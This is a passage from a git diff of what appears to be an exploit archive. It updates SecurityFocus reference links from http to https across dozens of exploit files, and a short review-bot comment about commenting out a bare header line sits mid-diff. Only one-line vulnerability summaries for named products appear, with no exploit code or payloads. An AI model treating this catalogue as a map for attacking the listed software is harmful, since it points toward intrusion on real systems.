adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33499.txt b/exploits/multiple/remote/33499.txt index c19c0ee8c..8f5de23c5 100644 --- a/exploits/multiple/remote/33499.txt +++ b/exploits/multiple/remote/33499.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37714/info +source: https://www.securityfocus.com/bid/37714/info Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33500.txt b/exploits/multiple/remote/33500.txt index 2eb2d5148..d8b2acc92 100644 --- a/exploits/multiple/remote/33500.txt +++ b/exploits/multiple/remote/33500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37714/info +source: https://www.securityfocus.com/bid/37714/info Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33503.txt b/exploits/multiple/remote/33503.txt index 3930a9498..860e54279 100644 --- a/exploits/multiple/remote/33503.txt +++ b/exploits/multiple/remote/33503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37717/info +source: https://www.securityfocus.com/bid/37717/info Orion Application Server is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33504.txt b/exploits/multiple/remote/33504.txt index 0998fc858..ed9ed404d 100644 --- a/exploits/multiple/remote/33504.txt +++ b/exploits/multiple/remote/33504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37718/info +source: https://www.securityfocus.com/bid/37718/info Boa Webserver is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33536.txt b/exploits/multiple/remote/33536.txt index 31d940d10..94960a641 100644 --- a/exploits/multiple/remote/33536.txt +++ b/exploits/multiple/remote/33536.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37843/info +source: https://www.securityfocus.com/bid/37843/info Zenoss is prone to multiple cross-site request-forgery vulnerabilities. diff --git a/exploits/multiple/remote/33553.txt b/exploits/multiple/remote/33553.txt index 9763b57bf..ce8aadd73 100644 --- a/exploits/multiple/remote/33553.txt +++ b/exploits/multiple/remote/33553.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37896/info +source: https://www.securityfocus.com/bid/37896/info Sun Java System Web Server is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/remote/33562.html b/exploits/multiple/remote/33562.html index b0254a392..e9df83b31 100644 --- a/exploits/multiple/remote/33562.html +++ b/exploits/multiple/remote/33562.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37917/info +source: https://www.securityfocus.com/bid/37917/info Google Chrome is prone to a remote information-disclosure vulnerability. diff --git a/exploits/multiple/remote/33569.txt b/exploits/multiple/remote/33569.txt index 30aad2d44..2a4d84c13 100644 --- a/exploits/multiple/remote/33569.txt +++ b/exploits/multiple/remote/33569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37968/info +source: https://www.securityfocus.com/bid/37968/info HP System Management Homepage, also known as Systems Insight Manager, is prone to a cross-site scripting vulnerability. diff --git a/exploits/multiple/remote/33570.txt b/exploits/multiple/remote/33570.txt index 0daa27ccd..8655d0f4c 100644 --- a/exploits/multiple/remote/33570.txt +++ b/exploits/multiple/remote/33570.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37972/info +source: https://www.securityfocus.com/bid/37972/info SAP BusinessObjects is prone to multiple URI-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/33577.txt b/exploits/multiple/remote/33577.txt index 49ca3f8a2..c54bc5e23 100644 --- a/exploits/multiple/remote/33577.txt +++ b/exploits/multiple/remote/33577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37997/info +source: https://www.securityfocus.com/bid/37997/info XAMPP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/3359.pl b/exploits/multiple/remote/3359.pl index 8a4165589..e9ed04646 100755 --- a/exploits/multiple/remote/3359.pl +++ b/exploits/multiple/remote/3359.pl @@ -6,7 +6,7 @@ # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # -# REF: http://www.securityfocus.com/bid/16294 +# REF: https://www.securityfocus.com/bid/16294 # # AUTHOR: Andrea "bunker" Purificato # http://rawlab.mindcreations.com diff --git a/exploits/multiple/remote/33600.rb b/exploits/multiple/remote/33600.rb index 67c3adeb7..a18cef82e 100755 --- a/exploits/multiple/remote/33600.rb +++ b/exploits/multiple/remote/33600.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38115/info +source: https://www.securityfocus.com/bid/38115/info Oracle Database is prone to multiple remote privilege-escalation issues because it fails to properly restrict access to certain packages. diff --git a/exploits/multiple/remote/33601.rb b/exploits/multiple/remote/33601.rb index 0f14468b8..a0823eaaf 100755 --- a/exploits/multiple/remote/33601.rb +++ b/exploits/multiple/remote/33601.rb 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38115/info +source: https://www.securityfocus.com/bid/38115/info Oracle Database is prone to multiple remote privilege-escalation issues because it fails to properly restrict access to certain packages. diff --git a/exploits/multiple/remote/33615.txt b/exploits/multiple/remote/33615.txt index d8296a28e..70fbd7589 100644 --- a/exploits/multiple/remote/33615.txt +++ b/exploits/multiple/remote/33615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38143/info +source: https://www.securityfocus.com/bid/38143/info JDownloader is prone to a vulnerability that lets remote attackers execute arbitrary code. diff --git a/exploits/multiple/remote/33616.txt b/exploits/multiple/remote/33616.txt index 3c94234c1..b182ec3d2 100644 --- a/exploits/multiple/remote/33616.txt +++ b/exploits/multiple/remote/33616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38145/info +source: https://www.securityfocus.com/bid/38145/info Mongoose is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/3363.pl b/exploits/multiple/remote/3363.pl index 156b2c91a..c26761fca 100755 --- a/exploits/multiple/remote/3363.pl +++ b/exploits/multiple/remote/3363.pl @@ -6,7 +6,7 @@ # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # -# REF: http://www.securityfocus.com/bid/16287 +# REF: https://www.securityfocus.com/bid/16287 # # AUTHOR: Andrea "bunker" Purificato # http://rawlab.mindcreations.com diff --git a/exploits/multiple/remote/33653.txt b/exploits/multiple/remote/33653.txt index b2a26c90d..49af89dad 100644 --- a/exploits/multiple/remote/33653.txt +++ b/exploits/multiple/remote/33653.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38308/info +source: https://www.securityfocus.com/bid/38308/info PortWise SSL VPN is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33663.txt b/exploits/multiple/remote/33663.txt index 83fdc630d..53cab5fba 100644 --- a/exploits/multiple/remote/33663.txt +++ b/exploits/multiple/remote/33663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38360/info +source: https://www.securityfocus.com/bid/38360/info IBM WebSphere Portal is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33664.html b/exploits/multiple/remote/33664.html index 19d847ba9..61f85f110 100644 --- a/exploits/multiple/remote/33664.html +++ b/exploits/multiple/remote/33664.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38369/info +source: https://www.securityfocus.com/bid/38369/info Mozilla Firefox is prone to a remote information-disclosure vulnerability. diff --git a/exploits/multiple/remote/33682.txt b/exploits/multiple/remote/33682.txt index b5bca3c02..2744fa548 100644 --- a/exploits/multiple/remote/33682.txt +++ b/exploits/multiple/remote/33682.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38456/info +source: https://www.securityfocus.com/bid/38456/info Oracle Siebel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33686.txt b/exploits/multiple/remote/33686.txt index b0a28b8af..2d791faca 100644 --- a/exploits/multiple/remote/33686.txt +++ b/exploits/multiple/remote/33686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38481/info +source: https://www.securityfocus.com/bid/38481/info IBM Lotus Domino is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/multiple/remote/33689.as b/exploits/multiple/remote/33689.as index 3fe0b9c0d..ffea3102c 100644 --- a/exploits/multiple/remote/33689.as +++ b/exploits/multiple/remote/33689.as @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38517/info +source: https://www.securityfocus.com/bid/38517/info Adobe Flash Player is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/3376.pl b/exploits/multiple/remote/3376.pl index c8c487cb2..e2767312d 100755 --- a/exploits/multiple/remote/3376.pl +++ b/exploits/multiple/remote/3376.pl @@ -9,7 +9,7 @@ # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # -# REF: http://www.securityfocus.com/bid/16294 +# REF: https://www.securityfocus.com/bid/16294 # # AUTHOR: Andrea "bunker" Purificato # http://rawlab.mindcreations.com diff --git a/exploits/multiple/remote/3377.pl b/exploits/multiple/remote/3377.pl index cf4dfee74..218aaf450 100755 --- a/exploits/multiple/remote/3377.pl +++ b/exploits/multiple/remote/3377.pl @@ -9,7 +9,7 @@ # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # -# REF: http://www.securityfocus.com/bid/16287 +# REF: https://www.securityfocus.com/bid/16287 # # AUTHOR: Andrea "bunker" Purificato # http://rawlab.mindcreations.com diff --git a/exploits/multiple/remote/33774.txt b/exploits/multiple/remote/33774.txt index 1afde5318..c5c97f20e 100644 --- a/exploits/multiple/remote/33774.txt +++ b/exploits/multiple/remote/33774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38852/info +source: https://www.securityfocus.com/bid/38852/info IBM Lotus Notes is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33780.txt b/exploits/multiple/remote/33780.txt index be8e42d89..4173e1079 100644 --- a/exploits/multiple/remote/33780.txt +++ b/exploits/multiple/remote/33780.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38880/info +source: https://www.securityfocus.com/bid/38880/info IBM Lotus Notes is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33786.txt b/exploits/multiple/remote/33786.txt index da7688cf8..b718476ad 100644 --- a/exploits/multiple/remote/33786.txt +++ b/exploits/multiple/remote/33786.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38897/info +source: https://www.securityfocus.com/bid/38897/info Cafu is prone to a remote NULL pointer dereference vulnerability and a remote client format string vulnerability. diff --git a/exploits/multiple/remote/33802.txt b/exploits/multiple/remote/33802.txt index ce8ac4c31..5a0fe77b2 100644 --- a/exploits/multiple/remote/33802.txt +++ b/exploits/multiple/remote/33802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38974/info +source: https://www.securityfocus.com/bid/38974/info RakNet is prone to a remote integer-underflow vulnerability because it fails to sufficiently validate an integer value. diff --git a/exploits/multiple/remote/33816.pl b/exploits/multiple/remote/33816.pl index a4593a168..76f0690a9 100755 --- a/exploits/multiple/remote/33816.pl +++ b/exploits/multiple/remote/33816.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39209/info +source: https://www.securityfocus.com/bid/39209/info Miranda IM is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/33839.txt b/exploits/multiple/remote/33839.txt index 8ef577aac..e47d1a393 100644 --- a/exploits/multiple/remote/33839.txt +++ b/exploits/multiple/remote/33839.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39510/info +source: https://www.securityfocus.com/bid/39510/info Oracle E-Business Suite Financials is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/remote/33847.txt b/exploits/multiple/remote/33847.txt index 1975799d0..ab7d67d23 100644 --- a/exploits/multiple/remote/33847.txt +++ b/exploits/multiple/remote/33847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39555/info +source: https://www.securityfocus.com/bid/39555/info netkar-PRO is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check messages before copying them to an insufficiently sized memory buffer. diff --git a/exploits/multiple/remote/33868.txt b/exploits/multiple/remote/33868.txt index 4fe03faee..f65bca9cb 100644 --- a/exploits/multiple/remote/33868.txt +++ b/exploits/multiple/remote/33868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39636/info +source: https://www.securityfocus.com/bid/39636/info Apache ActiveMQ is prone to a vulnerability that lets attackers access source code because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33871.txt b/exploits/multiple/remote/33871.txt index f56c850af..74b0283ae 100644 --- a/exploits/multiple/remote/33871.txt +++ b/exploits/multiple/remote/33871.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39666/info +source: https://www.securityfocus.com/bid/39666/info Tiny Java Web Server is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include a directory-traversal vulnerability, an open-redirection vulnerability, and a source code information-disclosure vulnerability. 
diff --git a/exploits/multiple/remote/33873.txt b/exploits/multiple/remote/33873.txt index 2ff468498..f06b2f372 100644 --- a/exploits/multiple/remote/33873.txt +++ b/exploits/multiple/remote/33873.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39676/info +source: https://www.securityfocus.com/bid/39676/info HP System Management Homepage is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33877.c b/exploits/multiple/remote/33877.c index 2cf2d1897..9298c7bb0 100644 --- a/exploits/multiple/remote/33877.c +++ b/exploits/multiple/remote/33877.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/39693/info +source: https://www.securityfocus.com/bid/39693/info NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. diff --git a/exploits/multiple/remote/33878.c b/exploits/multiple/remote/33878.c index 766b1c97d..9009364f5 100644 --- a/exploits/multiple/remote/33878.c +++ b/exploits/multiple/remote/33878.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39693/info +// source: https://www.securityfocus.com/bid/39693/info NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. diff --git a/exploits/multiple/remote/33905.txt b/exploits/multiple/remote/33905.txt index 644bb3def..d875c1881 100644 --- a/exploits/multiple/remote/33905.txt +++ b/exploits/multiple/remote/33905.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39771/info +source: https://www.securityfocus.com/bid/39771/info Apache ActiveMQ is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33907.txt b/exploits/multiple/remote/33907.txt index 105b9978e..a4886b4ee 100644 --- a/exploits/multiple/remote/33907.txt +++ b/exploits/multiple/remote/33907.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39789/info +source: https://www.securityfocus.com/bid/39789/info The ZKSoftware ZK5000 device is prone to a remote information-disclosure vulnerability. diff --git a/exploits/multiple/remote/33940.txt b/exploits/multiple/remote/33940.txt index 6eb5804db..0e53583c6 100644 --- a/exploits/multiple/remote/33940.txt +++ b/exploits/multiple/remote/33940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39949/info +source: https://www.securityfocus.com/bid/39949/info VMware View is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/34048.html b/exploits/multiple/remote/34048.html index bbffa9010..225255e8b 100644 --- a/exploits/multiple/remote/34048.html +++ b/exploits/multiple/remote/34048.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40407/info +source: https://www.securityfocus.com/bid/40407/info Brekeke PBX is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/multiple/remote/34186.txt b/exploits/multiple/remote/34186.txt index 901a12d99..729cb78e9 100644 --- a/exploits/multiple/remote/34186.txt +++ b/exploits/multiple/remote/34186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41076/info +source: https://www.securityfocus.com/bid/41076/info Apache Axis2 is prone to a session-fixation vulnerability. diff --git a/exploits/multiple/remote/34271.txt b/exploits/multiple/remote/34271.txt index 1eab65310..01f475a3b 100644 --- a/exploits/multiple/remote/34271.txt +++ b/exploits/multiple/remote/34271.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41460/info +source: https://www.securityfocus.com/bid/41460/info id Tech 4 Engine is prone to a remote code-execution vulnerability. diff --git a/exploits/multiple/remote/34297.txt b/exploits/multiple/remote/34297.txt index 5a1cdbcf6..005c81e78 100644 --- a/exploits/multiple/remote/34297.txt 
+++ b/exploits/multiple/remote/34297.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41560/info +source: https://www.securityfocus.com/bid/41560/info dotDefender is prone to a security-bypass vulnerability because it fails to restrict malicious data from reaching protected sites. diff --git a/exploits/multiple/remote/34301.txt b/exploits/multiple/remote/34301.txt index 075581751..874c32616 100644 --- a/exploits/multiple/remote/34301.txt +++ b/exploits/multiple/remote/34301.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41571/info +source: https://www.securityfocus.com/bid/41571/info The Asterisk Recording Interface is prone to the following issues: diff --git a/exploits/multiple/remote/34310.txt b/exploits/multiple/remote/34310.txt index 00b3f6582..6ab29d2e7 100644 --- a/exploits/multiple/remote/34310.txt +++ b/exploits/multiple/remote/34310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41617/info +source: https://www.securityfocus.com/bid/41617/info Oracle Business Process Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/34312.txt b/exploits/multiple/remote/34312.txt index 010b3d7d0..4da3c8726 100644 --- a/exploits/multiple/remote/34312.txt +++ b/exploits/multiple/remote/34312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41620/info +source: https://www.securityfocus.com/bid/41620/info Oracle WebLogic Server is prone to a remote vulnerability. diff --git a/exploits/multiple/remote/34369.txt b/exploits/multiple/remote/34369.txt index 821f2f6f3..e7c785ab8 100644 --- a/exploits/multiple/remote/34369.txt +++ b/exploits/multiple/remote/34369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41918/info +source: https://www.securityfocus.com/bid/41918/info IBM Java is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input. 
diff --git a/exploits/multiple/remote/34372.txt b/exploits/multiple/remote/34372.txt index e0e3bc05c..cb37e603e 100644 --- a/exploits/multiple/remote/34372.txt +++ b/exploits/multiple/remote/34372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41929/info +source: https://www.securityfocus.com/bid/41929/info Twonky Server is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/remote/34439.txt b/exploits/multiple/remote/34439.txt index fbdd4845f..b728f3ffe 100644 --- a/exploits/multiple/remote/34439.txt +++ b/exploits/multiple/remote/34439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42411/info +source: https://www.securityfocus.com/bid/42411/info ServletExec is prone to a directory-traversal vulnerability and multiple authentication-bypass vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/34500.html b/exploits/multiple/remote/34500.html index 37aa6bf42..759d7a1eb 100644 --- a/exploits/multiple/remote/34500.html +++ b/exploits/multiple/remote/34500.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42556/info +source: https://www.securityfocus.com/bid/42556/info Flock Browser is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/34523.txt b/exploits/multiple/remote/34523.txt index 8554d7b3a..d39bf8c69 100644 --- a/exploits/multiple/remote/34523.txt +++ b/exploits/multiple/remote/34523.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42661/info +source: https://www.securityfocus.com/bid/42661/info Nagios XI is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
diff --git a/exploits/multiple/remote/34691.txt b/exploits/multiple/remote/34691.txt index 4b08b99b6..a8ecfd6ea 100644 --- a/exploits/multiple/remote/34691.txt +++ b/exploits/multiple/remote/34691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43378/info +source: https://www.securityfocus.com/bid/43378/info CollabNet Subversion Edge is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/remote/34796.txt b/exploits/multiple/remote/34796.txt index 3066e7b83..5d828a706 100644 --- a/exploits/multiple/remote/34796.txt +++ b/exploits/multiple/remote/34796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43677/info +source: https://www.securityfocus.com/bid/43677/info MySQL is prone to a remote privilege-escalation vulnerability. diff --git a/exploits/multiple/remote/34945.txt b/exploits/multiple/remote/34945.txt index 4e9e389b5..7ac66c251 100644 --- a/exploits/multiple/remote/34945.txt +++ b/exploits/multiple/remote/34945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44580/info +source: https://www.securityfocus.com/bid/44580/info Home File Share Server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/34949.py b/exploits/multiple/remote/34949.py index d32cdb3bc..ab74a9be3 100755 --- a/exploits/multiple/remote/34949.py +++ b/exploits/multiple/remote/34949.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44597/info +source: https://www.securityfocus.com/bid/44597/info BroadWorks is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/34952.txt b/exploits/multiple/remote/34952.txt index 3c0d9aa4c..2bef18e3e 100644 --- a/exploits/multiple/remote/34952.txt +++ b/exploits/multiple/remote/34952.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44616/info +source: https://www.securityfocus.com/bid/44616/info Apache Shiro is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/35003.txt b/exploits/multiple/remote/35003.txt index b210d6510..3a1c04136 100644 --- a/exploits/multiple/remote/35003.txt +++ b/exploits/multiple/remote/35003.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44940/info +source: https://www.securityfocus.com/bid/44940/info IBM OmniFind is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/35062.txt b/exploits/multiple/remote/35062.txt index 51644004e..e1a7048ce 100644 --- a/exploits/multiple/remote/35062.txt +++ b/exploits/multiple/remote/35062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45245/info +source: https://www.securityfocus.com/bid/45245/info RDM Embedded is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. The issue affects the 'lm_tcp' service. diff --git a/exploits/multiple/remote/35092.html b/exploits/multiple/remote/35092.html index 5547d6d32..0be68b630 100644 --- a/exploits/multiple/remote/35092.html +++ b/exploits/multiple/remote/35092.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45340/info +source: https://www.securityfocus.com/bid/45340/info Helix Server is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/multiple/remote/35144.txt b/exploits/multiple/remote/35144.txt index 648e95620..294f80ba0 100644 --- a/exploits/multiple/remote/35144.txt +++ b/exploits/multiple/remote/35144.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45568/info +source: https://www.securityfocus.com/bid/45568/info Appweb is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/35242.txt b/exploits/multiple/remote/35242.txt index 1593e330c..bfcaf8fc7 100644 --- a/exploits/multiple/remote/35242.txt +++ b/exploits/multiple/remote/35242.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45921/info +source: https://www.securityfocus.com/bid/45921/info Eclipse IDE is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/35243.txt b/exploits/multiple/remote/35243.txt index 40742d0c5..81dc3143f 100644 --- a/exploits/multiple/remote/35243.txt +++ b/exploits/multiple/remote/35243.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45921/info +source: https://www.securityfocus.com/bid/45921/info Eclipse IDE is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/35252.php b/exploits/multiple/remote/35252.php index 990bbbc98..507080292 100644 --- a/exploits/multiple/remote/35252.php +++ b/exploits/multiple/remote/35252.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45973/info +source: https://www.securityfocus.com/bid/45973/info The 'libxml2' library is prone to a local information-disclosure vulnerability. diff --git a/exploits/multiple/remote/35284.pl b/exploits/multiple/remote/35284.pl index ce114bd90..83ef90d2c 100755 --- a/exploits/multiple/remote/35284.pl +++ b/exploits/multiple/remote/35284.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46003/info +source: https://www.securityfocus.com/bid/46003/info Opera Web Browser is prone to a remote integer-overflow vulnerability. 
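Review bot: in the 35284.pl hunk, line 1 is still an uncommented `source:` line at the top of a Perl script with mode 100755, and the context line "Opera Web Browser is prone to ..." below it is uncommented too. The 3363.pl hunk in this same patch shows the reference carried as `# REF:` inside a `#` header. Since this line is being rewritten anyway, prefix it and the description text with `#`, so that the file header is a comment rather than bare prose in an executable file.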
diff --git a/exploits/multiple/remote/35316.sh b/exploits/multiple/remote/35316.sh index 21f0db690..6bda39440 100755 --- a/exploits/multiple/remote/35316.sh +++ b/exploits/multiple/remote/35316.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46178/info +source: https://www.securityfocus.com/bid/46178/info The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability. diff --git a/exploits/multiple/remote/35352.rb b/exploits/multiple/remote/35352.rb index 3311dcf7a..df2597f0b 100755 --- a/exploits/multiple/remote/35352.rb +++ b/exploits/multiple/remote/35352.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46423/info +source: https://www.securityfocus.com/bid/46423/info Ruby on Rails is prone to a vulnerability that allows attackers to inject arbitrary content into the 'X-Forwarded-For', 'X-Forwarded-Host' and 'X-Forwarded-Server' HTTP headers because the 'WEBrick::HTTPRequest' module fails to sufficiently sanitize input. diff --git a/exploits/multiple/remote/35364.txt b/exploits/multiple/remote/35364.txt index 32fdd4683..230a9e8d7 100644 --- a/exploits/multiple/remote/35364.txt +++ b/exploits/multiple/remote/35364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46471/info +source: https://www.securityfocus.com/bid/46471/info IBM Lotus Sametime Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/35366.txt b/exploits/multiple/remote/35366.txt index c55724ca0..a7ab63454 100644 --- a/exploits/multiple/remote/35366.txt +++ b/exploits/multiple/remote/35366.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46471/info +source: https://www.securityfocus.com/bid/46471/info IBM Lotus Sametime Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. 
diff --git a/exploits/multiple/remote/35398.pl b/exploits/multiple/remote/35398.pl index 301742b6a..a89535783 100755 --- a/exploits/multiple/remote/35398.pl +++ b/exploits/multiple/remote/35398.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46608/info +source: https://www.securityfocus.com/bid/46608/info KMPlayer is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/multiple/remote/35464.txt b/exploits/multiple/remote/35464.txt index 63a7c91de..35ced3a9b 100644 --- a/exploits/multiple/remote/35464.txt +++ b/exploits/multiple/remote/35464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46864/info +source: https://www.securityfocus.com/bid/46864/info Trend Micro WebReputation API is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/35495.txt b/exploits/multiple/remote/35495.txt index b5c7c0902..8b8c6919f 100644 --- a/exploits/multiple/remote/35495.txt +++ b/exploits/multiple/remote/35495.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47008/info +source: https://www.securityfocus.com/bid/47008/info Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities including an information-disclosure issue and a remote code-execution issue. diff --git a/exploits/multiple/remote/35501.pl b/exploits/multiple/remote/35501.pl index 2e72cae43..82f877971 100755 --- a/exploits/multiple/remote/35501.pl +++ b/exploits/multiple/remote/35501.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47039/info +source: https://www.securityfocus.com/bid/47039/info RealPlayer is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/multiple/remote/35570.txt 